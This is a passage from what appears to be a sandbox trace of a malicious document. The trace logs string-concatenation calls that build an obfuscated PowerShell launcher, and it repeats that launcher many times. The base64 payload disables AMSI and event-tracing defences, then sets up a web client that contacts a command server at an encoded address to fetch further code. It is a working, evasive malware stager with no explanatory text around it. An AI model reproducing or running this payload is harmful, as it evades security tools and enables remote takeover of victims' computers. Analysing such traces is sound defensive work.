AdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMA", bstrRight="LgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.831] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQ", bstrRight="BkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQAp", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.831] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQAp", bstrRight="ADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.831] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC", bstrRight="4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.832] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQA", bstrRight="ZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.832] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALg", bstrRight="BQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.832] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9", bstrRight="ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.832] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuA